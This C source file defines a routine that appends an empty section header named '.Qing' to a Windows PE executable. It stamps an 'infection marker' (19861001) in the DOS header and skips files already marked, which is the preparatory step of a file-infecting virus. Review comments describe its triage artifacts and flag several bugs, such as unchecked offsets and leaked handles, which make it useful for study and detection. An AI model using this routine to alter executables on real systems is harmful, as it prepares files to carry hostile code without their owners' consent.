话说PE增加区段......
//**********************************************
// Method:    AddEmptySection
// Returns:   BOOL - TRUE once the new section header has been written,
//            FALSE when an API call or one of the header checks fails
// Parameter: PCTSTR ptFile  path of the file that receives the empty section
// Parameter: UINT uSize     size of the empty section
//
// Maps ptFile read/write, stamps a marker DWORD into the DOS header's e_res2
// field, appends one section header named ".Qing" after the last existing
// header and adjusts the counters in IMAGE_NT_HEADERS. No section data is
// written: SizeOfRawData of the new header is 0.
//
// For triage: the constant 19861001 at e_res2 and a trailing read/write
// section named ".Qing" with SizeOfRawData == 0 are the static artifacts this
// routine leaves in a modified file.
//
// NOTE(review): every value read from the mapped file (e_lfanew,
// NumberOfSections, alignments, the last section header) is used without
// being checked against the size of the view, so a malformed input can make
// the pointer arithmetic below leave the mapping.
//**********************************************
BOOL AddEmptySection(PCTSTR ptFile,UINT uSize)
{
    HANDLE hFile = NULL;
    HANDLE hMapping = NULL;
    LPVOID bPointer = NULL;
    PBYTE pData = NULL;

    // Open the source file
    hFile = CreateFile(
        ptFile,
        GENERIC_READ|GENERIC_WRITE,
        FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_SEQUENTIAL_SCAN,
        NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;

    // Create the file-mapping object (unnamed: the name argument is NULL)
    // NOTE(review): dwSize is not declared in this function or passed to it;
    // presumably a file-scope variable holding the file size - confirm.
    if (!(hMapping = CreateFileMapping(hFile, 0, PAGE_READWRITE | SEC_COMMIT, 0, dwSize, NULL)))
    {
        CloseHandle(hFile);
        return FALSE;
    }

    // Map a view of the object for reading and writing
    if (!(bPointer = MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, dwSize)))
    {
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return FALSE;
    }

    pData = (PBYTE)bPointer;

    // Check the DOS signature
    // NOTE(review): this return does not unmap the view or close hMapping and
    // hFile; the same applies to the two "return FALSE" checks further down.
    if (((PIMAGE_DOS_HEADER) pData)->e_magic != IMAGE_DOS_SIGNATURE)
    {
        return FALSE;
    }

    // Check whether the file has already been infected
    if( *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) == 19861001)
    {
        // Already infected, skip it
        UnmapViewOfFile(bPointer);
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return FALSE;
    }
    else
    {
        // Set the infection marker
        // NOTE(review): the marker is written before the PE signature and
        // header-space checks, so a file that fails those checks is still
        // modified.
        *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) = 19861001;
    }

    // Check the PE signature
    // NOTE(review): e_lfanew comes straight from the file and is not compared
    // with the mapped size before pNTHdr is dereferenced.
    PIMAGE_NT_HEADERS pNTHdr = (PIMAGE_NT_HEADERS) (pData + ((PIMAGE_DOS_HEADER) bPointer)->e_lfanew);
    if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;

    // Check the space available for section headers
    // NOTE(review): only the size of the section table is compared with
    // SizeOfHeaders; the offset at which the table starts is not part of the
    // comparison, so it can pass even when there is no free slot.
    if ((pNTHdr->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNTHdr->OptionalHeader.SizeOfHeaders)
        return FALSE;

    // Calculate code and file delta
    // ZALIGN is defined outside this block; presumably it rounds the first
    // argument up to a multiple of the second - confirm.
    DWORD uCodeDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.SectionAlignment);
    DWORD dwFileDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.FileAlignment);

    // Get the new section header and the one before it
    // NOTE(review): "pNTHdr + 1" places the section table at
    // sizeof(IMAGE_NT_HEADERS) past the signature instead of using
    // FileHeader.SizeOfOptionalHeader, and with NumberOfSections == 0
    // pLastSec points into the NT headers rather than at a section header.
    PIMAGE_SECTION_HEADER pNewSec = (PIMAGE_SECTION_HEADER) (pNTHdr + 1) + pNTHdr->FileHeader.NumberOfSections;
    PIMAGE_SECTION_HEADER pLastSec = pNewSec - 1;

    // Fill in the new section header; only the six fields below are set, the
    // remaining fields keep whatever bytes were already at that position
    memcpy(pNewSec->Name, ".Qing", 6);
    pNewSec->VirtualAddress = pLastSec->VirtualAddress +
        ZALIGN(pLastSec->Misc.VirtualSize, pNTHdr->OptionalHeader.SectionAlignment);
    pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData;
    pNewSec->Misc.VirtualSize = uSize;
    pNewSec->SizeOfRawData = 0;//uCodeDelta;
    pNewSec->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE ;// section attributes

    // Update IMAGE_NT_HEADERS to account for the new section
    // NOTE(review): SizeOfCode grows although the section is not flagged as
    // code, and SizeOfImage grows by the FileAlignment-rounded delta while the
    // section's VirtualAddress is rounded with SectionAlignment.
    pNTHdr->FileHeader.NumberOfSections++;
    pNTHdr->OptionalHeader.SizeOfCode += uCodeDelta;
    pNTHdr->OptionalHeader.SizeOfImage += dwFileDelta;
    // pNTHdr->OptionalHeader.AddressOfEntryPoint;//no change here
    // The bound-import directory entry is zeroed; presumably because that data
    // can sit where the new section header was just written - confirm.
    pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
    pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;

    UnmapViewOfFile(bPointer); // release the view
    CloseHandle(hMapping);
    CloseHandle(hFile);
    return TRUE;
}